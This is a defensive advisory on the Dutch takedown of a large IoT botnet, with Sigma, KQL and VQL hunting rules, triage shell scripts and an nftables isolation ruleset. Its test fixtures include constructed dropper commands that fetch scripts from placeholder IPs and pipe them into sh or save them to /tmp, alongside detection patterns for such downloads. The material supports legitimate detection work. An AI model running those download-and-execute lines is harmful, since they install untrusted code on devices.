In a significant operation against cybercrime, Dutch authorities have dismantled a massive botnet comprising approximately 17 million infected devices. The operation, which resulted in the seizure of over 200 servers from a local provider, targeted the infrastructure used to control this sprawling network of compromised machines. While the command-and-control (C2) servers have been taken offline, the infected devices—ranging from home routers to IoT endpoints—remain compromised.
For security practitioners, this is not a time for complacency. The disruption of the C2 temporarily neutralizes the threat actor's ability to issue commands (e.g., DDoS attacks or data exfiltration), but the malware persistence mechanisms remain active on the endpoints. If the actors regain control of infrastructure or point the C2 domain at new servers, the botnet can be resurrected. Defenders must act now to identify infected nodes, eradicate the malware, and close the vulnerability gaps that allowed the initial infection.
Technical Analysis
Threat Overview
The disruption targets a large-scale IoT botnet, exhibiting characteristics consistent with families like Mozi or Mirai. These botnets typically target Linux-based embedded systems (MIPS, ARM, SH4 architectures) found in routers, DVRs, and IP cameras. The infection vector usually involves:
- Exploitation of Vulnerabilities: Targeting unpatched firmware vulnerabilities (e.g., CVE-2023-1389, CVE-2022-26258) in web interfaces or UPnP services.
- Brute Force: Utilizing default or weak credentials on Telnet/SSH services.
Affected Platforms
- Operating Systems: Embedded Linux distributions (BusyBox-based).
- Hardware: SOHO/SMB Routers, Wireless Access Points, IoT Cameras, Digital Video Recorders (DVRs).
Exploitation Mechanism
Once a device is compromised, the malware typically performs the following actions:
- Payload Drop: Downloads a binary (ELF executable) to a writable directory (e.g., /tmp, /var, /dev/shm).
- Persistence: Copies the binary to a permanent location and adds an entry to crontab or /etc/inittab, or creates an init script in /etc/init.d/ to ensure execution upon reboot.
- C2 Communication: Connects to the controller server (often via raw TCP or HTTP) to receive instructions. Some variants use Distributed Hash Tables (DHT) to hide the C2.
Exploitation Status
- In-the-Wild: Confirmed active exploitation; the scale of the takedown (17M devices) proves widespread successful infection.
- Remediation Status: While the Dutch police have disrupted the C2, patching the devices is the only permanent remediation. Many infected devices are consumer-grade and difficult to patch remotely, often requiring a factory reset and firmware update.
Detection & Response
Sigma Rules
The following Sigma rules focus on the behavioral indicators typical of IoT/Linux botnets: downloading executables from suspicious locations and setting persistence in common init paths.
---
title: Suspicious Linux Executable Download via Curl/Wget
id: a1b2c3d4-5678-90ab-cdef-123456789abc
status: experimental
description: Detects the download of executable files from the internet using wget or curl, a common step in IoT botnet infection chains.
references:
  - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2024/05/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/wget'
      - '/curl'
    CommandLine|contains:
      - 'http'
      - 'ftp'
  condition: selection
falsepositives:
  - Legitimate software updates
  - Administrative downloads
level: high
---
title: Linux Persistence via Init Script Creation
id: b2c3d4e5-6789-01ab-cdef-234567890bcd
status: experimental
description: Detects the creation of new scripts in /etc/init.d/ or modification of rc.local, common persistence mechanisms for Linux botnets.
references:
  - https://attack.mitre.org/techniques/T1543/
author: Security Arsenal
date: 2024/05/06
tags:
  - attack.persistence
  - attack.t1543   # T1543.001 is the macOS Launch Agent sub-technique; tag the parent technique the reference points to
logsource:
  category: file_creation
  product: linux
detection:
  selection:
    TargetFilename|startswith:
      - '/etc/init.d/'
      - '/etc/rc.d/'
    TargetFilename|endswith:
      - '.sh'
      - '.run'
  condition: selection
falsepositives:
  - Legitimate software installation
  - System administration scripts
level: medium
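To see what the first rule's selection actually matches, and where it needs tuning, here is its logic applied to a handful of constructed process_creation events. This is an added example, not part of the advisory and not a Sigma backend; the tab-separated "Image<TAB>CommandLine" input format, the sample events (documentation-range IPs, not real indicators) and the function names are this example's own assumptions. The tuned variant addresses two points a reviewer would raise: on BusyBox-based devices the downloader runs as an applet, so Image is /bin/busybox and the endswith match never fires, and the rule as written lights up on every routine package update (the false positives listed under the rule). Requiring the payload to land in a writable staging directory or be piped into a shell separates a dropper from an administrative download.

```sh
#!/bin/sh
# Added example: the Sigma selection from the first rule above, evaluated with
# awk over constructed events, next to a tuned variant. Not the advisory's code.

# Constructed sample events: "Image<TAB>CommandLine" (assumed format, not a SIEM schema)
sample_events() {
    printf '%s\t%s\n' \
        '/usr/bin/curl'   'curl -fsSL https://updates.example.invalid/agent.tgz -o /opt/agent.tgz' \
        '/bin/busybox'    'busybox wget http://198.51.100.10/x.sh -O /tmp/x.sh' \
        '/usr/bin/wget'   'wget -q http://198.51.100.10/arm7 -O /dev/shm/.a' \
        '/usr/bin/curl'   'curl -s http://203.0.113.5/i.sh | sh' \
        '/usr/sbin/ntpd'  'ntpd -p pool.ntp.org'
}

# Rule as written: Image ends with /wget or /curl AND CommandLine contains http or ftp.
# Misses the BusyBox applet case and fires on the /opt package update.
match_download_rule() {
    awk -F'\t' '$1 ~ /\/(wget|curl)$/ && $2 ~ /(http|ftp)/'
}

# Tuned variant: also accept "busybox wget|curl", and require the download to
# land in a writable staging directory or be piped straight into a shell.
match_download_rule_tuned() {
    awk -F'\t' '
        ($1 ~ /\/(wget|curl)$/ || $2 ~ /^busybox +(wget|curl) /) &&
        $2 ~ /(http|ftp)/ &&
        $2 ~ /(\/tmp\/|\/var\/tmp\/|\/dev\/shm\/|[|] *(sh|bash)( |$))/'
}

# Hit counts over the samples: both return 3, but on different rows
# (the tuned rule drops the /opt update and picks up the busybox dropper).
count_rule()       { sample_events | match_download_rule       | grep -c . ; }
count_rule_tuned() { sample_events | match_download_rule_tuned | grep -c . ; }

sample_events | match_download_rule_tuned
```

The tuned version is still a hunting rule rather than a blocking one: a legitimate firmware updater that stages its download in /tmp will match, so keep the falsepositives entries from the rule and baseline your own update tooling first.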
KQL (Microsoft Sentinel)
This query hunts for devices behind the perimeter firewall that show high-volume outbound connection patterns on ports commonly used by IoT botnets for scanning and C2 (Telnet, alternate HTTP, IRC). It assumes perimeter firewall logs are ingested into the CommonSecurityLog (CEF) table.
// Hunt for high-volume outbound connections to ports commonly used by IoT botnets
// Assumes firewall logs in CommonSecurityLog (CEF)
let SuspiciousPorts = dynamic([23, 2323, 80, 8080, 5555, 6667, 8443]);
CommonSecurityLog
| where DeviceVendor in ("Cisco", "Juniper", "Fortinet", "Palo Alto")
| where DestinationPort in (SuspiciousPorts)
// CEF carries the verdict in DeviceAction (Activity is the event name); vendors spell it differently
| where DeviceAction in~ ("allow", "allowed", "permit", "accept")
| extend SourceIP = SourceAddress, DestIP = DestinationAddress
| project TimeGenerated, SourceIP, DestIP, DestinationPort, DeviceAction, ApplicationProtocol
// Group by source so the result names the internal device to triage; many distinct destinations = scanning, many hits on one = beaconing
| summarize Connections = count(), Destinations = dcount(DestIP) by SourceIP, DestinationPort, bin(TimeGenerated, 5m)
| where Connections > 10 // Threshold for scanning/botnet activity; tune per environment
| sort by Connections desc
Velociraptor VQL
This artifact hunts for ELF binaries with the execute bit set in writable temporary directories, the staging locations named in the Exploitation Mechanism section above.
-- Hunt for suspicious executables in writable staging directories
-- glob() takes a list of patterns; Mode is the permission string (e.g. -rwxr-xr-x)
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs=['/tmp/*', '/var/tmp/*', '/dev/shm/*'])
WHERE NOT IsDir
  AND Mode =~ 'x'    -- Any execute bit set
  AND Size > 10000   -- Filter out small text files and pipes
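The Velociraptor artifact above tells you that executables are sitting in the staging directories; on a BusyBox device, which usually ships without file(1), the next question is what they are. The following shell functions, added here as an example and not part of the advisory or of Velociraptor, read the ELF header with od and report class, byte order and target architecture, so a binary built for a different architecture than the device, or a set of payloads for several architectures, stands out. It assumes an od that accepts -t (GNU coreutils, or BusyBox built with desktop options); the sample headers are constructed byte sequences, not real malware, and the helper names (elf_info, triage_dirs, make_samples) are this example's own.

```sh
#!/bin/sh
# Added example: identify the target architecture of ELF payloads found in
# writable staging directories using only od, cut and tr. Not the advisory's code.

# Decode the first 20 bytes of an ELF header. Prints e.g. "ELF32 big-endian MIPS",
# or "not-elf" for anything else. Exit status is 0 only for ELF files.
elf_info() {
    hdr=$(od -An -tx1 -N20 -v "$1" 2>/dev/null | tr -d ' \n')
    case "$hdr" in
        7f454c46*) ;;                       # \x7fELF magic
        *) echo "not-elf"; return 1 ;;
    esac
    case "$(printf '%s' "$hdr" | cut -c9-10)" in      # EI_CLASS, byte 4
        01) class=ELF32 ;; 02) class=ELF64 ;; *) class="ELF?" ;;
    esac
    m1=$(printf '%s' "$hdr" | cut -c37-38)             # e_machine, bytes 18-19
    m2=$(printf '%s' "$hdr" | cut -c39-40)
    case "$(printf '%s' "$hdr" | cut -c11-12)" in     # EI_DATA, byte 5, sets byte order
        01) endian=little-endian; machine="$m2$m1" ;;
        02) endian=big-endian;    machine="$m1$m2" ;;
        *)  endian=unknown-endian; machine="$m1$m2" ;;
    esac
    case "$machine" in                                 # e_machine values from the ELF spec
        0003) arch=x86 ;;     0008) arch=MIPS ;;   0014) arch=PowerPC ;;
        0028) arch=ARM ;;     002a) arch=SuperH ;; 003e) arch=x86-64 ;;
        00b7) arch=AArch64 ;; *) arch="unknown(0x$machine)" ;;
    esac
    echo "$class $endian $arch"
}

# List every regular file (dotfiles included) in the given directories with its
# ELF verdict; run on a device as: triage_dirs /tmp /var/tmp /dev/shm
triage_dirs() {
    for d in "$@"; do
        for f in "$d"/* "$d"/.[!.]*; do
            [ -f "$f" ] || continue
            printf '%s: %s\n' "$f" "$(elf_info "$f")"
        done
    done
}

# Constructed 20-byte sample headers (not real malware): only EI_CLASS,
# EI_DATA and e_machine matter here. Prints the directory they were written to.
make_samples() {
    d=$(mktemp -d)
    # ELF32, big-endian, e_machine 0x0008 (MIPS), hidden file as droppers like to use
    printf '\177ELF\001\002\001\000\000\000\000\000\000\000\000\000\000\002\000\010' > "$d/.x"
    # ELF32, little-endian, e_machine 0x0028 (ARM)
    printf '\177ELF\001\001\001\000\000\000\000\000\000\000\000\000\002\000\050\000' > "$d/arm7"
    # ELF32, little-endian, e_machine 0x002a (SuperH/SH4)
    printf '\177ELF\001\001\001\000\000\000\000\000\000\000\000\000\002\000\052\000' > "$d/sh4"
    # Not ELF: a shell script (documentation-range IP, constructed)
    printf '#!/bin/sh\nwget http://203.0.113.5/bot -O /tmp/bot\n' > "$d/i.sh"
    echo "$d"
}

SAMPLES=$(make_samples)
triage_dirs "$SAMPLES"
rm -rf "$SAMPLES"
```

Compare the reported architecture with uname -m on the device: a payload that matches it is the live one, anything else is staging debris worth preserving for analysis before the directory is cleared.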
Remediation Script (Bash)
This script helps triage a suspected device: it lists downloaders running out of writable staging directories, non-standard listening ports, recently changed init scripts, and persistence entries that reference those directories. It kills nothing; review its output before acting.
#!/bin/sh
# Triage Script for Linux IoT Botnet Infection
# Usage: ./remediate_iot.sh   (run as root on the suspect device)
# POSIX sh so it runs under BusyBox ash as well as bash; uses only the option
# subset that BusyBox ps/netstat share with procps/net-tools.

echo "[+] Checking for suspicious processes..."
# Mozi/Mirai variants use random process names, so key on the path instead:
# downloaders or busybox running out of writable staging directories.
# (/var alone is too broad: syslogd writing /var/log would match.)
PS_OUT=$(ps aux 2>/dev/null || ps w 2>/dev/null || ps)
SUSPICIOUS_PROCS=$(echo "$PS_OUT" | grep -E '(wget|curl|tftp|busybox)' | grep -E '(/tmp|/var/tmp|/var/run|/dev/shm)' | grep -v grep)
if [ -n "$SUSPICIOUS_PROCS" ]; then
    echo "[!] Suspicious processes found:"
    echo "$SUSPICIOUS_PROCS"
    echo "[!] Warning: Manual review required before killing to avoid service disruption."
else
    echo "[?] No obvious suspicious processes running from writable directories."
fi

echo "[+] Checking for listening non-standard ports..."
# TCP listeners above 1024 (standard http/ssh/dns/telnet are below).
# Take the last colon-separated field so IPv6 sockets such as :::5555 parse too.
netstat -tln 2>/dev/null | awk '/LISTEN/ { n = split($4, a, ":"); print a[n] }' | sort -un | while read -r port; do
    [ "$port" -gt 1024 ] 2>/dev/null || continue
    echo "[!] Port $port is open:"
    netstat -tlnp 2>/dev/null | grep -E ":$port[[:space:]]" | grep LISTEN
done

echo "[+] Checking /etc/init.d/ for unusual scripts..."
ls -lat /etc/init.d/ | head -n 10
# Persistence entries that point back into writable directories are a strong signal.
echo "[+] Checking init scripts, inittab and crontabs for references to writable directories..."
grep -lE '(/tmp|/var/tmp|/var/run|/dev/shm)/' /etc/init.d/* /etc/inittab /etc/rc.local /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* 2>/dev/null

echo "[+] Remediation Steps Manual:"
echo "1. Update device firmware to the latest version."
echo "2. Change default administrative passwords."
echo "3. Disable Telnet and UPnP if not required."
echo "4. Perform a factory reset if infection cannot be confirmed removed."
Remediation
Immediate defensive actions are required to secure the edge:
- Firmware Updates: Identify all IoT devices and SOHO routers on the network. Check the vendor's security advisory page and apply the latest firmware updates. Patching is the primary defense against exploitation of the CVEs used in the initial compromise.
- Credential Hygiene: Ensure default credentials are not in use. Enforce strong, unique passwords for administrative interfaces (Web UI, SSH, Telnet).
- Network Segmentation: Isolate IoT devices on a separate VLAN (Zone). Restrict their communication to only necessary upstream services (e.g., NTP, DNS) and block peer-to-peer communication between IoT devices.
- Disable Insecure Services: Disable Telnet (use SSHv2 only) and disable Universal Plug and Play (UPnP) on edge routers to prevent unintended port forwarding.
- Factory Reset: For devices where infection is confirmed or suspected, and where malware removal is not feasible, perform a factory reset followed immediately by a firmware update and credential change.
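The segmentation and insecure-service items above translate into a short edge-router ruleset. The following nftables configuration is an added example, not the advisory's own or any vendor's configuration; the interface name (vlan20), the resolver and NTP addresses, and the table and chain names are assumed placeholders to be replaced with the real VLAN layout. It allows the IoT segment nothing but DNS and NTP to internal servers, logs every other connection attempt so the egress denials double as a hunting feed, and refuses Telnet and UPnP/SSDP to the router itself from that segment.

```sh
#!/bin/sh
# Added example: nftables ruleset that isolates an IoT VLAN on an edge router.
# Interface name and server addresses are assumed placeholders for this example.
IOT_IF="${IOT_IF:-vlan20}"                 # IoT VLAN interface on the router
DNS_SERVER="${DNS_SERVER:-192.168.1.53}"   # internal resolver the devices may use
NTP_SERVER="${NTP_SERVER:-192.168.1.123}"  # internal time source

# Emit the ruleset; kept as a function so it can be reviewed or syntax-checked
# with `iot_ruleset | nft -c -f -` before it is loaded.
iot_ruleset() {
cat <<EOF
table inet iot_segment {
  chain forward {
    type filter hook forward priority 0; policy accept;
    # Replies to connections the trusted LAN opened towards IoT devices are fine
    ct state established,related accept
    # Everything originating in the IoT VLAN goes through the egress allow-list
    iifname "$IOT_IF" jump iot_egress
  }
  chain iot_egress {
    # Only the necessary upstream services: DNS and NTP to the internal servers
    ip daddr $DNS_SERVER udp dport 53 accept
    ip daddr $DNS_SERVER tcp dport 53 accept
    ip daddr $NTP_SERVER udp dport 123 accept
    # No IoT-to-LAN and no IoT-to-Internet (covers Telnet/HTTP C2 and scanning); log for hunting
    log prefix "iot-egress-denied " counter drop
  }
  chain input {
    type filter hook input priority 0; policy accept;
    # Telnet and UPnP/SSDP on the router are not offered to the IoT segment
    iifname "$IOT_IF" tcp dport { 23, 2323 } counter drop
    iifname "$IOT_IF" udp dport 1900 counter drop
  }
}
EOF
}

# Load the ruleset (root and nftables required); validate first with nft -c.
apply_ruleset() { iot_ruleset | nft -f -; }

iot_ruleset
```

Two caveats when applying this. Traffic between two devices on the same VLAN never reaches the router's forward hook, so the "no peer-to-peer" requirement has to be enforced at layer 2 as well, with wireless client isolation or switch port isolation (private VLANs). And devices that genuinely need a vendor cloud service will need an explicit accept for that destination ahead of the logging drop; the iot-egress-denied log lines show exactly which destinations to review.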